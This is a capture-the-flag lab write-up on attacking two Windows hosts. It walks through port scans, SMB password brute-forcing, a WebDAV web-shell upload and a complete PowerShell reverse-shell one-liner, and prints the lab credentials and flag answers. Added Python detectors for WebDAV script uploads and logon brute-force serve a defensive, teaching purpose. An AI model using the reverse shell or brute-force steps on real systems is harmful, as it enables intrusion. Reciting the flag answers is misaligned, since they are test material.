System-Host Based Attacks CTF 1
Overview
System/host-based attacks target the underlying operating system or individual hosts within a network to compromise their security. These attacks exploit vulnerabilities in the system's configuration, software, or hardware to gain unauthorized access, escalate privileges, or disrupt the normal functioning of the host. Common techniques include exploiting unpatched software vulnerabilities, misconfigurations, weak passwords, and malware infections. Attackers may attempt to gain root or administrator privileges to manipulate or steal sensitive data, install backdoors, or cause system crashes. System/host-based attacks can lead to significant breaches if not detected and mitigated promptly, making it essential for organizations to regularly update software, implement strong security policies, and monitor for suspicious activity to protect their systems from these threats.
This lab is designed to test your knowledge and skills in performing system/host-based attacks on Windows targets and identifying hidden information on a target machine.
In this lab environment, you will be provided with GUI access to a Kali Linux machine. Two machines are accessible at http://target1.ine.local and http://target2.ine.local.
Objective: Perform system/host-based attacks on the target and capture all the flags hidden within the environment.
Useful files:
/usr/share/metasploit-framework/data/wordlists/common_users.txt,
/usr/share/metasploit-framework/data/wordlists/unix_passwords.txt,
/usr/share/webshells/asp/webshell.asp
Flags to Capture:
Flag 1: User 'bob' might not have chosen a strong password. Try common passwords to gain access to the server where the flag is located. (target1.ine.local)
Flag 2: Valuable files are often on the C: drive. Explore it thoroughly. (target1.ine.local)
Flag 3: By attempting to guess SMB user credentials, you may uncover important information that could lead you to the next flag. (target2.ine.local)
Flag 4: The Desktop directory might have what you're looking for. Enumerate its contents. (target2.ine.local)
Writeup
Flag 1
Let's start by running an nmap scan on target1.ine.local.
┌──(root㉿INE)-[~]
└─# nmap -p- --min-rate=10000 target1.ine.local
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-04-06 21:30 IST
SYN Stealth Scan Timing: About 99.99% done; ETC: 21:30 (0:00:00 remaining)
Nmap scan report for target1.ine.local (10.4.18.127)
Host is up (0.0094s latency).
Not shown: 64209 closed tcp ports (reset), 1311 filtered tcp ports (no-response)
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp open ms-wbt-server
5985/tcp open wsman
47001/tcp open winrm
49664/tcp open unknown
49665/tcp open unknown
49666/tcp open unknown
49667/tcp open unknown
49668/tcp open unknown
49670/tcp open unknown
49674/tcp open unknown
49679/tcp open unknown
┌──(root㉿INE)-[~/Desktop]
└─# nmap -sC -sV -p`cat nmap.txt` target1.ine.local
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-04-06 21:35 IST
Nmap scan report for target1.ine.local (10.4.18.127)
Host is up (0.0094s latency).
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ Basic realm=target1.ine.local
|_http-title: 401 - Unauthorized: Access is denied due to invalid credentials.
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
3389/tcp open ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2025-04-06T16:06:06+00:00; -1s from scanner time.
| ssl-cert: Subject: commonName=EC2AMAZ-JVD17HK
| Not valid before: 2024-12-31T07:25:48
|_Not valid after: 2025-07-02T07:25:48
| rdp-ntlm-info:
| Target_Name: EC2AMAZ-JVD17HK
| NetBIOS_Domain_Name: EC2AMAZ-JVD17HK
| NetBIOS_Computer_Name: EC2AMAZ-JVD17HK
| DNS_Domain_Name: EC2AMAZ-JVD17HK
| DNS_Computer_Name: EC2AMAZ-JVD17HK
| Product_Version: 10.0.17763
|_ System_Time: 2025-04-06T16:05:59+00:00
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49670/tcp open msrpc Microsoft Windows RPC
49674/tcp open msrpc Microsoft Windows RPC
49679/tcp open msrpc Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: -1s, deviation: 0s, median: -1s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2025-04-06T16:06:01
|_ start_date: N/A
Attempt brute-forcing smb for user bob using the provided wordlists.
┌──(root㉿INE)-[~/Desktop]
└─# crackmapexec smb target1.ine.local -u bob -p /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
SMB target1.ine.local 445 EC2AMAZ-JVD17HK [*] Windows 10 / Server 2019 Build 17763 x64 (name:EC2AMAZ-JVD17HK) (domain:EC2AMAZ-JVD17HK) (signing:False) (SMBv1:False)
SMB target1.ine.local 445 EC2AMAZ-JVD17HK [-] EC2AMAZ-JVD17HK\bob:admin STATUS_LOGON_FAILURE
...
SMB target1.ine.local 445 EC2AMAZ-JVD17HK [-] EC2AMAZ-JVD17HK\bob:MargaretThatcheris110%SEXY STATUS_LOGON_FAILURE
SMB target1.ine.local 445 EC2AMAZ-JVD17HK [-] EC2AMAZ-JVD17HK\bob:karaf STATUS_LOGON_FAILURE
SMB target1.ine.local 445 EC2AMAZ-JVD17HK [-] EC2AMAZ-JVD17HK\bob:vagrant STATUS_LOGON_FAILURE
SMB target1.ine.local 445 EC2AMAZ-JVD17HK [+] EC2AMAZ-JVD17HK\bob:password_123321
┌──(root㉿INE)-[~/Desktop]
└─# smbmap -r -u bob -p password_123321 -H target1.ine.local
SMBMap - Samba Share Enumerator v1.10.2 | Shawn Evans - ShawnDEvans@gmail.com
https://github.com/ShawnDEvans/smbmap
[*] Detected 1 hosts serving SMB
[*] Established 1 SMB connections(s) and 1 authentidated session(s)
[+] IP: 10.4.18.127:445 Name: target1.ine.local Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ READ ONLY Remote IPC
./IPC$
fr--r--r-- 3 Mon Jan 1 05:53:28 1601 InitShutdown
fr--r--r-- 4 Mon Jan 1 05:53:28 1601 lsass
fr--r--r-- 3 Mon Jan 1 05:53:28 1601 ntsvcs
fr--r--r-- 3 Mon Jan 1 05:53:28 1601 scerpc
fr--r--r-- 1 Mon Jan 1 05:53:28 1601 Winsock2\CatalogChangeListener-340-0
fr--r--r-- 3 Mon Jan 1 05:53:28 1601 epmapper
fr--r--r-- 1 Mon Jan 1 05:53:28 1601 Winsock2\CatalogChangeListener-1bc-0
fr--r--r-- 3 Mon Jan 1 05:53:28 1601 LSM_API_service
fr--r--r-- 3 Mon Jan 1 05:53:28 1601 eventlog
fr--r--r-- 1 Mon Jan 1 05:53:28 1601 Winsock2\CatalogChangeListener-440-0
fr--r--r-- 3 Mon Jan 1 05:53:28 1601 atsvc
fr--r--r-- 1 Mon Jan 1 05:53:28 1601 Winsock2\CatalogChangeListener-574-0
fr--r--r-- 4 Mon Jan 1 05:53:28 1601 wkssvc
fr--r--r-- 3 Mon Jan 1 05:53:28 1601 TermSrv_API_service
fr--r--r-- 3 Mon Jan 1 05:53:28 1601 Ctx_WinStation_API_service
fr--r--r-- 3 Mon Jan 1 05:53:28 1601 SessEnvPublicRpc
fr--r--r-- 1 Mon Jan 1 05:53:28 1601 Winsock2\CatalogChangeListener-80c-0
fr--r--r-- 3 Mon Jan 1 05:53:28 1601 spoolss
fr--r--r-- 1 Mon Jan 1 05:53:28 1601 Winsock2\CatalogChangeListener-8b8-0
fr--r--r-- 3 Mon Jan 1 05:53:28 1601 trkwks
fr--r--r-- 3 Mon Jan 1 05:53:28 1601 W32TIME_ALT
fr--r--r-- 4 Mon Jan 1 05:53:28 1601 srvsvc
fr--r--r-- 1 Mon Jan 1 05:53:28 1601 Winsock2\CatalogChangeListener-850-0
fr--r--r-- 1 Mon Jan 1 05:53:28 1601 Winsock2\CatalogChangeListener-240-0
fr--r--r-- 1 Mon Jan 1 05:53:28 1601 Winsock2\CatalogChangeListener-254-0
fr--r--r-- 1 Mon Jan 1 05:53:28 1601 PIPE_EVENTROOT\CIMV2SCM EVENT PROVIDER
fr--r--r-- 1 Mon Jan 1 05:53:28 1601 iisipmcccbe316-f262-429f-b505-8a01d0cfa06c
fr--r--r-- 1 Mon Jan 1 05:53:28 1601 iislogpipeabb3be6c-e326-4d3d-8350-345ed666e264
fr--r--r-- 1 Mon Jan 1 05:53:28 1601 E0K3f4WKN427r17Sd66Kr9sR2h8jvYM1POJzkXBZrdxR8QbP2CcokovPMPwF6ULwaG5jMqWeGtEsGHuKKDtqX67ES3D74jFdjDCnRJ3SCXygl6GNn6vDrC
fr--r--r-- 1 Mon Jan 1 05:53:28 1601 CPFATP_2760_v4.0.30319
The shares show nothing interesting. Logging in via RDP doesn't work either. Check the website: it asks for a username and password. Try the credentials found, bob:password_123321. Behind the login is an IIS server, and in the webdav folder we find the first flag.
Answer
fcc829e1edb744dd807634cd3ac4edb6
Flag 2
Let's exploit webdav to upload a reverse shell using metasploit.
After several attempts, I decide to upload a web shell.
Using a PowerShell reverse shell payload, I gain a reverse shell.
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.42.2',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
[*] Started reverse TCP handler on 10.10.42.2:4444
[*] Command shell session 1 opened (10.10.42.2:4444 -> 10.4.24.223:49810) at 2025-04-06 23:04:25 +0530
PS C:\windows\system32\inetsrv>
I find flag2 in C:/.
PS C:\windows\system32\inetsrv> cd /
PS C:\> ls
Directory: C:\
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 11/14/2018 6:56 AM EFI
d----- 12/31/2024 7:18 AM inetpub
d----- 4/6/2025 5:34 PM Microsoft
d----- 5/13/2020 5:58 PM PerfLogs
d-r--- 1/1/2025 7:31 AM Program Files
d----- 11/7/2020 7:47 AM Program Files (x86)
d-r--- 1/1/2025 7:30 AM Users
d----- 11/7/2020 7:49 AM Utilities
d----- 4/6/2025 5:14 PM Windows
-a---- 4/6/2025 5:10 PM 34 flag2.txt
PS C:\> type flag2.txt
Answer
ea5697e8128445ea98a28b34e4f03f7a
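Seen from the defender's side, the WebDAV upload used for this flag leaves a clear trace in the IIS access log: an authenticated PUT of a script file followed by a request that executes it. The parser below is an added example, not part of the original writeup; the log lines, file names and the function names `parse_w3c` and `find_webdav_script_uploads` are constructed for illustration.

```python
import posixpath

# Extensions that IIS may hand to a script engine instead of serving as static data.
SCRIPT_EXT = {".asp", ".aspx", ".ashx", ".asmx", ".asa", ".cer"}

# Constructed sample in IIS W3C extended format (not taken from the lab).
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 10.0
#Fields: date time cs-method cs-uri-stem cs-username c-ip sc-status
2025-04-06 17:20:11 PROPFIND /webdav/ bob 10.10.42.2 207
2025-04-06 17:20:15 PUT /webdav/notes.txt bob 10.10.42.2 201
2025-04-06 17:21:02 PUT /webdav/upload.asp bob 10.10.42.2 201
2025-04-06 17:21:30 GET /webdav/upload.asp bob 10.10.42.2 200
2025-04-06 17:22:00 PUT /webdav/report.aspx carol 10.0.0.7 403
2025-04-06 17:25:00 GET /webdav/notes.txt bob 10.10.42.2 200
"""


def parse_w3c(text):
    """Yield one dict per request, using the #Fields directive as the column map."""
    fields = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]          # the directive may change mid-file
        elif line and not line.startswith("#") and fields:
            values = line.split()
            if len(values) == len(fields):     # skip truncated or corrupt rows
                yield dict(zip(fields, values))


def find_webdav_script_uploads(text):
    """Flag successful PUTs of script files and later requests to those files."""
    uploaded = set()                           # lower-cased paths written via PUT
    findings = []
    for rec in parse_w3c(text):
        path = rec["cs-uri-stem"].lower()
        ext = posixpath.splitext(path)[1]
        method = rec["cs-method"].upper()
        succeeded = rec["sc-status"].startswith("2")
        who = (rec["cs-username"], rec["c-ip"])
        if method == "PUT" and ext in SCRIPT_EXT and succeeded:
            uploaded.add(path)
            findings.append(("script_upload", path) + who)
        elif method in ("GET", "POST") and path in uploaded and succeeded:
            findings.append(("uploaded_script_requested", path) + who)
    return findings


if __name__ == "__main__":
    for finding in find_webdav_script_uploads(SAMPLE_LOG):
        print(finding)
```

A hit on `script_upload` alone already justifies review; the mitigation is to disable WebDAV where it is not needed, or to remove script execute permission from any directory that accepts uploads.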
Flag 3
Run nmap again on target 2.
┌──(root㉿INE)-[~]
└─# nmap --min-rate=10000 -p- target2.ine.local
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-04-06 23:08 IST
Warning: 10.4.18.57 giving up on port because retransmission cap hit (10).
Nmap scan report for target2.ine.local (10.4.18.57)
Host is up (0.012s latency).
Not shown: 62059 closed tcp ports (reset), 3462 filtered tcp ports (no-response)
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp open ms-wbt-server
5985/tcp open wsman
47001/tcp open winrm
49664/tcp open unknown
49665/tcp open unknown
49666/tcp open unknown
49667/tcp open unknown
49668/tcp open unknown
49670/tcp open unknown
49671/tcp open unknown
49679/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 19.17 seconds
Run a full nmap scan with scripts and version detection.
┌──(root㉿INE)-[~/Desktop]
└─# nmap -sC -sV -p`cat nmap.txt` target2.ine.local
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-04-06 23:11 IST
Nmap scan report for target2.ine.local (10.4.18.57)
Host is up (0.0094s latency).
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows Server 2019 Datacenter 17763 microsoft-ds
3389/tcp open ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2025-04-06T17:42:03+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=EC2AMAZ-3SC2DRK
| Not valid before: 2024-12-31T08:26:27
|_Not valid after: 2025-07-02T08:26:27
| rdp-ntlm-info:
| Target_Name: EC2AMAZ-3SC2DRK
| NetBIOS_Domain_Name: EC2AMAZ-3SC2DRK
| NetBIOS_Computer_Name: EC2AMAZ-3SC2DRK
| DNS_Domain_Name: EC2AMAZ-3SC2DRK
| DNS_Computer_Name: EC2AMAZ-3SC2DRK
| Product_Version: 10.0.17763
|_ System_Time: 2025-04-06T17:41:54+00:00
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49670/tcp open msrpc Microsoft Windows RPC
49671/tcp open msrpc Microsoft Windows RPC
49679/tcp open msrpc Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2025-04-06T17:41:55
|_ start_date: N/A
|_clock-skew: mean: 0s, deviation: 2s, median: 0s
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
| smb-os-discovery:
| OS: Windows Server 2019 Datacenter 17763 (Windows Server 2019 Datacenter 6.3)
| Computer name: EC2AMAZ-3SC2DRK
| NetBIOS computer name: EC2AMAZ-3SC2DRK\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2025-04-06T17:41:59+00:00
Attempt brute-forcing credentials with hydra.
┌──(root㉿INE)-[~/Desktop]
└─# hydra -L /root/Desktop/wordlists/copy-paste-files/common_users.txt -P wordlists/copy-paste-files/common_passwords.txt smb://target2.ine.local
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-04-06 23:16:59
[INFO] Reduced number of tasks to 1 (smb does not like parallel connections)
[DATA] max 1 task per 1 server, overall 1 task, 350 login tries (l:7/p:50), ~350 tries per task
[DATA] attacking smb://target2.ine.local:445/
[445][smb] host: target2.ine.local login: demo password: password1
[445][smb] host: target2.ine.local login: administrator password: pineapple
1 of 1 target successfully completed, 2 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-04-06 23:17:09
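The password guessing against bob on target1 and the hydra run above both show up on the target as a burst of failed network logons (Security event 4625, LogonType 3) from one source, followed by a success (4624). The detector below is an added example, not part of the original writeup; the event lines are constructed, and the 60-second window and threshold of 5 are assumed values to tune per environment.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample, one event per line:
# time, EventID, LogonType, TargetUserName, IpAddress
# 4625 = failed logon, 4624 = successful logon, LogonType 3 = network (SMB).
SAMPLE = """\
2025-04-06T16:10:01,4625,3,bob,10.10.42.2
2025-04-06T16:10:02,4625,3,bob,10.10.42.2
2025-04-06T16:10:03,4625,3,bob,10.10.42.2
2025-04-06T16:10:04,4625,3,bob,10.10.42.2
2025-04-06T16:10:05,4625,3,bob,10.10.42.2
2025-04-06T16:10:06,4624,3,bob,10.10.42.2
2025-04-06T16:12:00,4625,3,alice,10.0.0.5
2025-04-06T16:12:10,4624,3,alice,10.0.0.5
2025-04-06T17:46:59,4625,3,demo,10.10.42.2
2025-04-06T17:47:00,4625,3,administrator,10.10.42.2
2025-04-06T17:47:01,4625,3,demo,10.10.42.2
2025-04-06T17:47:02,4625,3,administrator,10.10.42.2
2025-04-06T17:47:03,4625,3,guest,10.10.42.2
2025-04-06T17:47:04,4624,3,administrator,10.10.42.2
2025-04-06T17:50:00,4624,2,administrator,-
"""

WINDOW = timedelta(seconds=60)   # assumed sliding window
THRESHOLD = 5                    # assumed failures per source within the window


def parse(text):
    """Yield (time, event_id, logon_type, user, source_ip) tuples."""
    for line in text.strip().splitlines():
        ts, eid, ltype, user, ip = line.split(",")
        yield datetime.fromisoformat(ts), int(eid), int(ltype), user.lower(), ip


def detect(text, window=WINDOW, threshold=THRESHOLD):
    """Return alerts for guessing bursts and for a success that follows one."""
    failures = defaultdict(deque)          # source ip -> recent (time, user) failures
    alerts = []
    for ts, eid, ltype, user, ip in parse(text):
        if ltype != 3:                     # only network logons are in scope here
            continue
        recent = failures[ip]
        while recent and ts - recent[0][0] > window:
            recent.popleft()               # drop failures older than the window
        if eid == 4625:
            recent.append((ts, user))
            if len(recent) == threshold:   # alert when the burst crosses the threshold
                users = sorted({u for _, u in recent})
                kind = "password_spray" if len(users) > 1 else "password_guessing"
                alerts.append((kind, ip, users))
        elif eid == 4624 and len(recent) >= threshold:
            # A success right after a burst means a guessed credential worked.
            alerts.append(("success_after_failures", ip, [user]))
            recent.clear()
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE):
        print(alert)
```

An account lockout policy and non-dictionary passwords remove the weakness itself; the `success_after_failures` alert is the one to page on, since it marks an account that should be treated as compromised.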
Hydra finds demo:password1 and administrator:pineapple. Log in to smb with these credentials. Using smbmap, I see the entire directory tree:
┌──(root㉿INE)-[~/Desktop]
└─# smbmap -u administrator -p pineapple -H target2.ine.local -r
SMBMap - Samba Share Enumerator v1.10.2 | Shawn Evans - ShawnDEvans@gmail.com
https://github.com/ShawnDEvans/smbmap
[*] Detected 1 hosts serving SMB
[*] Established 1 SMB connections(s) and 1 authentidated session(s)
[/] Enumerating and traversing shares...
[+] IP: 10.4.18.57:445 Name: target2.ine.local Status: ADMIN!!!
Disk Permissions Comment
---- ----------- -------
ADMIN$ READ, WRITE Remote Admin
./ADMIN$
dr--r--r-- 0 Sun Apr 6 23:19:58 2025 .
dr--r--r-- 0 Sun Apr 6 23:19:58 2025 ..
dr--r--r-- 0 Wed Sep 9 11:16:15 2020 ADFS
dr--r--r-- 0 Wed Sep 9 11:16:15 2020 appcompat
dr--r--r-- 0 Wed Sep 9 11:16:15 2020 apppatch
dr--r--r-- 0 Sat Nov 7 12:58:26 2020 AppReadiness
dw--w--w-- 0 Sat Nov 7 13:02:44 2020 assembly
dr--r--r-- 0 Wed Sep 9 11:16:15 2020 bcastdvr
fr--r--r-- 78848 Wed Sep 9 11:14:09 2020 bfsvc.exe
dr--r--r-- 0 Wed Sep 9 11:16:15 2020 Boot
fr--r--r-- 67584 Sun Apr 6 22:41:30 2025 bootstat.dat
dr--r--r-- 0 Wed Sep 9 11:16:15 2020 Branding
dr--r--r-- 0 Tue Dec 31 17:03:51 2024 CbsTemp
dr--r--r-- 0 Wed Sep 9 11:16:15 2020 Containers
dr--r--r-- 0 Wed Sep 9 11:16:15 2020 Cursors
dr--r--r-- 0 Wed Sep 9 11:16:15 2020 debug
fr--r--r-- 232960 Wed Sep 9 11:14:09 2020 DfsrAdmin.exe
fr--r--r-- 1315 Wed Sep 9 11:14:09 2020 DfsrAdmin.exe.config
dr--r--r-- 0 Wed Sep 9 11:16:15 2020 diagnostics
dr--r--r-- 0 Wed Sep 9 11:16:15 2020 DigitalLocker
dr--r--r-- 0 Wed Sep 9 11:16:15 2020 Downloaded Program Files
fr--r--r-- 219754 Wed Sep 9 11:14:09 2020 DPINST.LOG
dr--r--r-- 0 Wed Sep 9 11:16:15 2020 drivers
fr--r--r-- 56781 Wed Jan 1 13:54:07 2025 DtcInstall.log
dr--r--r-- 0 Wed Sep 9 11:16:15 2020 ELAMBKUP
dr--r--r-- 0 Wed Sep 9 11:16:15 2020 en-US
fr--r--r-- 4443888 Wed Sep 9 11:14:09 2020 explorer.exe
dw--w--w-- 0 Sat Nov 7 12:54:45 2020 Fonts
dr--r--r-- 0 Wed Sep 9 11:16:15 2020 Globalization
dr--r--r-- 0 Wed Sep 9 11:16:15 2020 Help
fr--r--r-- 1071616 Wed Sep 9 11:14:09 2020 HelpPane.exe
fr--r--r-- 18432 Wed Sep 9 11:14:09 2020 hh.exe
dr--r--r-- 0 Wed Sep 9 11:16:15 2020 IdentityCRL
dr--r--r-- 0 Wed Sep 9 11:16:15 2020 IME
dw--w--w-- 0 Wed Sep 9 11:16:15 2020 ImmersiveControlPanel
dr--r--r-- 0 Sun Apr 6 22:39:35 2025 INF
dr--r--r-- 0 Wed Sep 9 11:16:15 2020 InputMethod
dr--r--r-- 0 Wed Jan 1 13:47:30 2025 Installer
dr--r--r-- 0 Wed Sep 9 11:16:15 2020 L2Schemas
dr--r--r-- 0 Wed Sep 9 11:16:15 2020 LiveKernelReports
dr--r--r-- 0 Tue Dec 31 17:29:57 2024 Logs
fr--r--r-- 1380 Wed Sep 9 11:14:09 2020 lsasetup.log
dw--w--w-- 0 Wed Sep 9 11:16:15 2020 media
fr--r--r-- 43131 Wed Sep 9 11:14:09 2020 mib.bin
dw--w--w-- 0 Sun Apr 6 22:49:43 2025 Microsoft.NET
dr--r--r-- 0 Wed Sep 9 11:16:15 2020 Migration
dr--r--r-- 0 Wed Sep 9 11:16:15 2020 ModemLogs
fr--r--r-- 254464 Wed Sep 9 11:14:09 2020 notepad.exe
dr--r--r-- 0 Wed Sep 9 11:16:15 2020 OCR
dw--w--w-- 0 Wed Sep 9 11:16:15 2020 Offline Web Pages
dr--r--r-- 0 Wed Jan 1 13:56:28 2025 Panther
dr--r--r-- 0 Wed Sep 9 11:16:15 2020 Performance
fr--r--r-- 1399844 Wed Jan 1 13:53:29 2025 PFRO.log
dr--r--r-- 0 Wed Sep 9 11:16:15 2020 PLA
dr--r--r-- 0 Wed Sep 9 11:16:15 2020 PolicyDefinitions
dr--r--r-- 0 Sun Apr 6 22:39:32 2025 Prefetch
dw--w--w-- 0 Wed Sep 9 11:16:15 2020 PrintDialog
dr--r--r-- 0 Wed Sep 9 11:16:15 2020 Provisioning
fr--r--r-- 358400 Wed Sep 9 11:14:09 2020 regedit.exe
dr--r--r-- 0 Wed Sep 9 11:16:15 2020 Registration
dr--r--r-- 0 Wed Sep 9 11:16:15 2020 RemotePackages
dr--r--r-- 0 Wed Sep 9 11:16:15 2020 rescache
dr--r--r-- 0 Wed Sep 9 11:16:15 2020 Resources
dr--r--r-- 0 Wed Sep 9 11:16:15 2020 SchCache
dr--r--r-- 0 Wed Sep 9 11:16:15 2020 schemas
dr--r--r-- 0 Wed Sep 9 11:16:15 2020 security
fr--r--r-- 30914 Wed Sep 9 11:14:09 2020 ServerDataCenter.xml
dr--r--r-- 0 Wed Sep 9 11:16:15 2020 ServiceProfiles
dr--r--r-- 0 Wed Sep 9 11:16:15 2020 ServiceState
dr--r--r-- 0 Wed Sep 9 11:16:16 2020 servicing
dr--r--r-- 0 Wed Sep 9 11:16:16 2020 Setup
dr--r--r-- 0 Wed Sep 9 11:16:16 2020 ShellComponents
dr--r--r-- 0 Wed Sep 9 11:16:16 2020 ShellExperiences
dr--r--r-- 0 Wed Sep 9 11:16:16 2020 SKB
dr--r--r-- 0 Sun Apr 6 22:44:31 2025 SoftwareDistribution
dr--r--r-- 0 Wed Sep 9 11:16:16 2020 Speech
dr--r--r-- 0 Wed Sep 9 11:16:16 2020 Speech_OneCore
fr--r--r-- 165376 Wed Sep 9 11:14:09 2020 splwow64.exe
dr--r--r-- 0 Wed Sep 9 11:16:16 2020 System
fr--r--r-- 219 Wed Sep 9 11:14:09 2020 system.ini
dr--r--r-- 0 Sun Apr 6 22:43:40 2025 System32
dr--r--r-- 0 Wed Sep 9 11:16:16 2020 SystemApps
dr--r--r-- 0 Wed Sep 9 11:16:16 2020 SystemResources
dr--r--r-- 0 Sat Nov 7 12:54:48 2020 SysWOW64
dr--r--r-- 0 Wed Sep 9 11:16:16 2020 TAPI
dr--r--r-- 0 Wed Sep 9 11:16:16 2020 Tasks
dr--r--r-- 0 Sun Apr 6 22:49:43 2025 Temp
dr--r--r-- 0 Wed Sep 9 11:16:16 2020 TextInput
dr--r--r-- 0 Wed Sep 9 11:16:16 2020 tracing
dr--r--r-- 0 Wed Sep 9 11:16:16 2020 twain_32
fr--r--r-- 64512 Wed Sep 9 11:14:09 2020 twain_32.dll
dr--r--r-- 0 Wed Sep 9 11:16:16 2020 Vss
dr--r--r-- 0 Wed Sep 9 11:16:16 2020 WaaS
dr--r--r-- 0 Wed Sep 9 11:16:16 2020 Web
fr--r--r-- 92 Wed Sep 9 11:14:09 2020 win.ini
fw--w--w-- 670 Wed Sep 9 11:14:09 2020 WindowsShell.Manifest
fr--r--r-- 276 Sat Nov 7 13:45:54 2020 WindowsUpdate.log
fr--r--r-- 11776 Wed Sep 9 11:14:09 2020 winhlp32.exe
dr--r--r-- 0 Tue Dec 31 17:18:50 2024 WinSxS
fr--r--r-- 316640 Wed Sep 9 11:14:09 2020 WMSysPr9.prx
fr--r--r-- 11264 Wed Sep 9 11:14:09 2020 write.exe
C$ READ, WRITE Default share
./C$
dr--r--r-- 0 Sat Nov 7 13:45:59 2020 $Recycle.Bin
dr--r--r-- 0 Wed Sep 9 11:16:15 2020 Boot
fw--w--w-- 408692 Wed Sep 9 11:14:01 2020 bootmgr
fr--r--r-- 1 Wed Sep 9 11:14:01 2020 BOOTNXT
dr--r--r-- 0 Wed Sep 9 11:14:01 2020 Documents and Settings
dr--r--r-- 0 Wed Sep 9 11:16:15 2020 EFI
fr--r--r-- 34 Sun Apr 6 22:40:20 2025 flag3.txt
fr--r--r-- 2013265920 Sun Apr 6 22:39:28 2025 pagefile.sys
dr--r--r-- 0 Wed Sep 9 11:16:15 2020 PerfLogs
dw--w--w-- 0 Sat Nov 7 13:17:23 2020 Program Files
dr--r--r-- 0 Sat Nov 7 13:17:24 2020 Program Files (x86)
dr--r--r-- 0 Wed Jan 1 13:47:15 2025 ProgramData
dr--r--r-- 0 Wed Jan 1 13:54:07 2025 Recovery
dr--r--r-- 0 Tue Dec 31 16:59:14 2024 Shared
dr--r--r-- 0 Sat Nov 7 12:06:43 2020 System Volume Information
dw--w--w-- 0 Wed Jan 1 14:00:24 2025 Users
dr--r--r-- 0 Sat Nov 7 13:19:14 2020 Utilities
dr--r--r-- 0 Sun Apr 6 23:19:58 2025 Windows
IPC$ READ ONLY Remote IPC
./IPC$
fr--r--r-- 3 Mon Jan 1 05:53:28 1601 InitShutdown
fr--r--r-- 4 Mon Jan 1 05:53:28 1601 lsass
fr--r--r-- 3 Mon Jan 1 05:53:28 1601 ntsvcs
fr--r--r-- 3 Mon Jan 1 05:53:28 1601 scerpc
fr--r--r-- 1 Mon Jan 1 05:53:28 1601 Winsock2\CatalogChangeListener-330-0
fr--r--r-- 3 Mon Jan 1 05:53:28 1601 epmapper
fr--r--r-- 1 Mon Jan 1 05:53:28 1601 Winsock2\CatalogChangeListener-1b4-0
fr--r--r-- 3 Mon Jan 1 05:53:28 1601 LSM_API_service
fr--r--r-- 3 Mon Jan 1 05:53:28 1601 eventlog
fr--r--r-- 1 Mon Jan 1 05:53:28 1601 Winsock2\CatalogChangeListener-434-0
fr--r--r-- 3 Mon Jan 1 05:53:28 1601 atsvc
